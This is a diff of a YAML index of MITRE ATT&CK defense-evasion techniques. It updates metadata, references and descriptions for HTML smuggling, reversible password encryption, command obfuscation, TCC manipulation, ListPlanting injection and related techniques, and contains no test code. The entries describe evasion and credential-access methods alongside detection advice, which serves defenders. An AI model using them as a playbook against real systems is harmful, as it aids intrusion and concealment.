-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Process: Process Access'
       - 'File: File Modification'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+      created: '2020-02-11T19:05:02.399Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/001
+        external_id: T1556.001
+      - source_name: Dell Skeleton
+        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+          Retrieved April 8, 2019.
+        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+      - source_name: TechNet Audit Policy
+        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+          June 3, 2016.
+        url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1027.006:
     technique:
-      modified: '2023-07-14T14:01:41.475Z'
+      modified: '2024-09-12T19:12:13.006Z'
       name: HTML Smuggling
       description: |-
         Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)
@@ -12188,48 +12511,17 @@ defense-evasion:
         url: https://www.menlosecurity.com/blog/new-attack-alert-duri
       - source_name: nccgroup Smuggling HTA 2017
         description: Warren, R. (2017, August 8). Smuggling HTA files in Internet
-          Explorer/Edge. Retrieved May 20, 2021.
-        url: https://research.nccgroup.com/2017/08/08/smuggling-hta-files-in-internet-explorer-edge/
+          Explorer/Edge. Retrieved September 12, 2024.
+        url: https://www.nccgroup.com/us/research-blog/smuggling-hta-files-in-internet-exploreredge/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1027.006
     atomic_tests: []
   T1556.005:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
-      type: attack-pattern
-      created: '2022-01-13T20:02:28.349Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.005
-        url: https://attack.mitre.org/techniques/T1556/005
-      - source_name: store_pwd_rev_enc
-        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
-        description: Microsoft. (2021, October 28). Store passwords using reversible
-          encryption. Retrieved January 3, 2022.
-      - source_name: how_pwd_rev_enc_1
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
-        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
-          encryption: how it works (part 1). Retrieved November 17, 2021.'
-      - source_name: how_pwd_rev_enc_2
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
-        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
-          encryption: how it works (part 2). Retrieved November 17, 2021.'
-      - source_name: dump_pwd_dcsync
-        url: https://adsecurity.org/?p=2053
-        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
-          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-26T15:40:31.871Z'
       name: Reversible Encryption
       description: |-
         An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
@@ -12251,6 +12543,7 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor property changes in Group Policy: <code>Computer
         Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
         Policy\\Store passwords using reversible encryption</code>. By default, the
@@ -12261,23 +12554,50 @@ defense-evasion:
         Directory PowerShell modules, such as <code>Set-ADUser</code> and <code>Set-ADAccountControl</code>,
         that change account configurations. \n\nMonitor Fine-Grained Password Policies
         and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Command: Command Execution'
       - 'User Account: User Account Metadata'
       - 'Script: Script Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+      created: '2022-01-13T20:02:28.349Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/005
+        external_id: T1556.005
+      - source_name: dump_pwd_dcsync
+        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+        url: https://adsecurity.org/?p=2053
+      - source_name: store_pwd_rev_enc
+        description: Microsoft. (2021, October 28). Store passwords using reversible
+          encryption. Retrieved January 3, 2022.
+        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+      - source_name: how_pwd_rev_enc_1
+        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+          encryption: how it works (part 1). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+      - source_name: how_pwd_rev_enc_2
+        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+          encryption: how it works (part 2). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1027.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T19:43:18.873Z'
       name: Command Obfuscation
       description: |-
         Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., [Phishing](https://attack.mitre.org/techniques/T1566) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)) or interactively via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: Akamai JS)(Citation: Malware Monday VBE)
@@ -12318,8 +12638,9 @@ defense-evasion:
         url: https://attack.mitre.org/techniques/T1027/010
         external_id: T1027.010
       - source_name: Twitter Richard WMIC
-        description: Ackroyd, R. (2023, March 24). Twitter. Retrieved March 24, 2023.
-        url: https://twitter.com/rfackroyd/status/1639136000755765254
+        description: Ackroyd, R. (2023, March 24). Twitter. Retrieved September 12,
+          2024.
+        url: https://x.com/rfackroyd/status/1639136000755765254
       - source_name: Invoke-Obfuscation
         description: Bohannon, D. (2016, September 24). Invoke-Obfuscation. Retrieved
           March 17, 2023.
@@ -12355,43 +12676,23 @@ defense-evasion:
         url: https://redcanary.com/threat-detection-report/techniques/powershell/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1070.004:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Walker Johnson
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
-      created: '2020-01-31T12:35:36.479Z'
-      x_mitre_version: '1.1'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1070.004
-        url: https://attack.mitre.org/techniques/T1070/004
-      - source_name: Microsoft SDelete July 2016
-        url: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
-        description: Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February
-          8, 2018.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-10-15T16:33:59.107Z'
+      name: 'Indicator Removal on Host: File Deletion'
       description: |-
         Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
 
         There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include <code>del</code> on Windows and <code>rm</code> or <code>unlink</code> on Linux and macOS.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Indicator Removal on Host: File Deletion'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Walker Johnson
+      x_mitre_deprecated: false
       x_mitre_detection: It may be uncommon for events related to benign command-line
         functions such as DEL or third-party utilities or tools to be found in an
         environment, depending on the user base and how systems are typically used.
@@ -12402,18 +12703,36 @@ defense-evasion:
         network that an adversary could introduce. Some monitoring tools may collect
         command-line arguments, but may not capture DEL commands since DEL is a native
         function within cmd.exe.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: defense-evasion
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Deletion'
       x_mitre_defense_bypassed:
       - Host forensic analysis
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
+      created: '2020-01-31T12:35:36.479Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1070/004
+        external_id: T1070.004
+      - source_name: Microsoft SDelete July 2016
+        description: Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February
+          8, 2018.
+        url: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.004
     atomic_tests: []
   T1221:
@@ -12475,7 +12794,7 @@ defense-evasion:
         description: Hanson, R. (2016, September 24). phishery. Retrieved July 21,
           2018.
         source_name: ryhanson phishery SEPT 2016
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-01-12T18:16:56.176Z'
       name: Template Injection
       description: |-
         Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.(Citation: Microsoft Open XML July 2017)
@@ -12505,13 +12824,11 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1221
     atomic_tests: []
   T1134:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.762Z'
       name: Access Token Manipulation
       description: |-
         Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
@@ -12608,7 +12925,6 @@ defense-evasion:
         url: https://pentestlab.blog/2017/04/03/token-manipulation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1027.002:
     technique:
@@ -12671,7 +12987,6 @@ defense-evasion:
         url: https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1027.002
     atomic_tests: []
   T1564.005:
@@ -12709,7 +13024,7 @@ defense-evasion:
         description: 'Kaspersky Lab''s Global Research and Analysis Team. (2015, February).
           Equation Group: Questions and Answers. Retrieved December 21, 2015.'
         url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-06-29T15:12:11.024Z'
       name: Hidden File System
       description: |-
         Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)
@@ -12736,8 +13051,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1055.005:
     technique:
@@ -12765,7 +13078,7 @@ defense-evasion:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:24:54.198Z'
       name: Thread Local Storage
       description: "Adversaries may inject malicious code into processes via thread
         local storage (TLS) callbacks in order to evade process-based defenses as
@@ -12809,8 +13122,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1622:
     technique:
@@ -12865,7 +13176,7 @@ defense-evasion:
         Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>IsDebuggerPresent()</code> and <code> NtQueryInformationProcess()</code>, or manually checking the <code>BeingDebugged</code> flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
 
         Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>OutputDebugStringW()</code>.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-16T15:05:55.918Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Debugger Evasion
       x_mitre_detection: |-
@@ -12885,7 +13196,6 @@ defense-evasion:
       - 'Command: Command Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1622
     atomic_tests: []
   T1036.006:
@@ -12935,7 +13245,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1036.006
     atomic_tests: []
   T1550.002:
@@ -12990,12 +13299,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1550.002
     atomic_tests: []
   T1574.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.241Z'
       name: 'Hijack Execution Flow: DLL Side-Loading'
       description: |-
         Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -13045,12 +13353,11 @@ defense-evasion:
         url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.002
     atomic_tests: []
   T1216.002:
     technique:
-      modified: '2024-04-18T23:51:40.464Z'
+      modified: '2024-09-12T19:42:21.547Z'
       name: SyncAppvPublishingServer
       description: "Adversaries may abuse SyncAppvPublishingServer.vbs to proxy execution
         of malicious [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands.
@@ -13110,8 +13417,8 @@ defense-evasion:
       - source_name: 7 - appv
         description: Nick Landers. (2017, August 8). Need a signed alternative to
           Powershell.exe? SyncAppvPublishingServer in Win10 has got you covered..
-          Retrieved February 6, 2024.
-        url: https://twitter.com/monoxgas/status/895045566090010624
+          Retrieved September 12, 2024.
+        url: https://x.com/monoxgas/status/895045566090010624
       - source_name: 3 - appv
         description: 'Raj Chandel. (2022, March 17). Indirect Command Execution: Defense
           Evasion (T1202). Retrieved February 6, 2024.'
@@ -13128,37 +13435,18 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1548.006:
     technique:
-      modified: '2024-04-17T00:02:12.021Z'
+      modified: '2024-10-16T16:54:56.714Z'
       name: TCC Manipulation
-      description: "Adversaries can manipulate or abuse the Transparency, Consent,
-        & Control (TCC) service or database to execute malicious applications with
-        elevated permissions. TCC is a Privacy & Security macOS control mechanism
-        used to determine if the running process has permission to access the data
-        or services protected by TCC, such as screen sharing, camera, microphone,
-        or Full Disk Access (FDA).\n\nWhen an application requests to access data
-        or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database,
-        located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent),
-        for existing permissions. If permissions do not exist, then the user is prompted
-        to grant permission. Once permissions are granted, the database stores the
-        application's permissions and will not prompt the user again unless reset.
-        For example, when a web browser requests permissions to the user's webcam,
-        once granted the web browser may not explicitly prompt the user again.(Citation:
-        welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise
-        abuse the TCC service to execute malicious content. This can be done in various
-        ways, including using privileged system applications to execute malicious
-        payloads or manipulating the database to grant their application TCC permissions.
-        \n\nFor example, adversaries can use Finder, which has FDA permissions by
-        default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002)
-        while preventing a user prompt. For a system without System Integrity Protection
-        (SIP) enabled, adversaries have also manipulated the operating system to load
-        an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation:
-        TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead
-        inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055))
-        into targeted applications with the desired TCC permissions.\n"
+      description: |+
+        Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
+
+        When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
+
+        Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
+
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -13166,6 +13454,8 @@ defense-evasion:
         phase_name: privilege-escalation
       x_mitre_contributors:
       - Marina Liang
+      - Wojciech Reguła @_r3ggi
+      - Csaba Fitzl @theevilbit of Kandji
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -13173,7 +13463,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - macOS
-      x_mitre_version: '1.0'
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Modification'
@@ -13203,7 +13493,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.008:
     technique:
@@ -13249,7 +13538,7 @@ defense-evasion:
         description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
           Retrieved December 20, 2017.
         source_name: Chokepoint preload rootkits
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:26:31.766Z'
       name: Ptrace System Calls
       description: "Adversaries may inject malicious code into processes via ptrace
         (process trace) system calls in order to evade process-based defenses as well
@@ -13294,8 +13583,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1027.007:
     technique:
@@ -13340,7 +13627,7 @@ defense-evasion:
         To avoid static or other defensive analysis, adversaries may use dynamic API resolution to conceal malware characteristics and functionalities. Similar to [Software Packing](https://attack.mitre.org/techniques/T1027/002), dynamic API resolution may change file signatures and obfuscate malicious API function calls until they are resolved and invoked during runtime.
 
         Various methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as `GetProcAddress()` and `LoadLibrary()`. These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) during execution).(Citation: BlackHat API Packers)(Citation: Drakonia HInvoke)(Citation: Huntress API Hash)
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-08-23T18:32:46.899Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Obfuscated Files or Information: Dynamic API Resolution'
       x_mitre_detection: ''
@@ -13354,58 +13641,28 @@ defense-evasion:
       - 'Process: OS API Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1027.007
     atomic_tests: []
   T1055.015:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - ESET
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
-      type: attack-pattern
-      created: '2021-11-22T15:02:15.190Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1055.015
-        url: https://attack.mitre.org/techniques/T1055/015
-      - source_name: Microsoft List View Controls
-        url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
-        description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
-          January 4, 2022.
-      - source_name: Modexp Windows Process Injection
-        url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
-        description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
-          Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
-          Retrieved November 15, 2021.'
-      - source_name: ESET InvisiMole June 2020
-        url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
-        description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
-          HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-14T17:34:33.948Z'
       name: 'Process Injection: ListPlanting'
       description: "Adversaries may abuse list-view controls to inject malicious code
         into hijacked processes in order to evade process-based defenses as well as
         possibly elevate privileges. ListPlanting is a method of executing arbitrary
-        code in the address space of a separate live process. Code executed via ListPlanting
-        may also evade detection from security products since the execution is masked
-        under a legitimate process.\n\nList-view controls are user interface windows
-        used to display collections of items.(Citation: Microsoft List View Controls)
-        Information about an application's list-view settings are stored within the
-        process' memory in a <code>SysListView32</code> control.\n\nListPlanting (a
-        form of message-passing \"shatter attack\") may be performed by copying code
-        into the virtual address space of a process that uses a list-view control
-        then using that code as a custom callback for sorting the listed items.(Citation:
-        Modexp Windows Process Injection) Adversaries must first copy code into the
-        target process’ memory space, which can be performed various ways including
-        by directly obtaining a handle to the <code>SysListView32</code> child of
-        the victim process window (via Windows API calls such as <code>FindWindow</code>
+        code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
+        Code executed via ListPlanting may also evade detection from security products
+        since the execution is masked under a legitimate process.\n\nList-view controls
+        are user interface windows used to display collections of items.(Citation:
+        Microsoft List View Controls) Information about an application's list-view
+        settings are stored within the process' memory in a <code>SysListView32</code>
+        control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
+        be performed by copying code into the virtual address space of a process that
+        uses a list-view control then using that code as a custom callback for sorting
+        the listed items.(Citation: Modexp Windows Process Injection) Adversaries
+        must first copy code into the target process’ memory space, which can be performed
+        various ways including by directly obtaining a handle to the <code>SysListView32</code>
+        child of the victim process window (via Windows API calls such as <code>FindWindow</code>
         and/or <code>EnumWindows</code>) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
         methods.\n\nSome variations of ListPlanting may allocate memory in the target
         process but then use window messages to copy the payload, to avoid the use
@@ -13422,6 +13679,9 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_contributors:
+      - ESET
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitoring Windows API calls indicative of the various types
         of code injection may generate a significant amount of data and may not be
         directly useful for defense unless collected under specific circumstances
@@ -13436,21 +13696,52 @@ defense-evasion:
         arguments.\n\nAnalyze process behavior to determine if a process is performing
         unusual actions, such as opening network connections, reading files, or other
         suspicious actions that could relate to post-compromise behavior. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
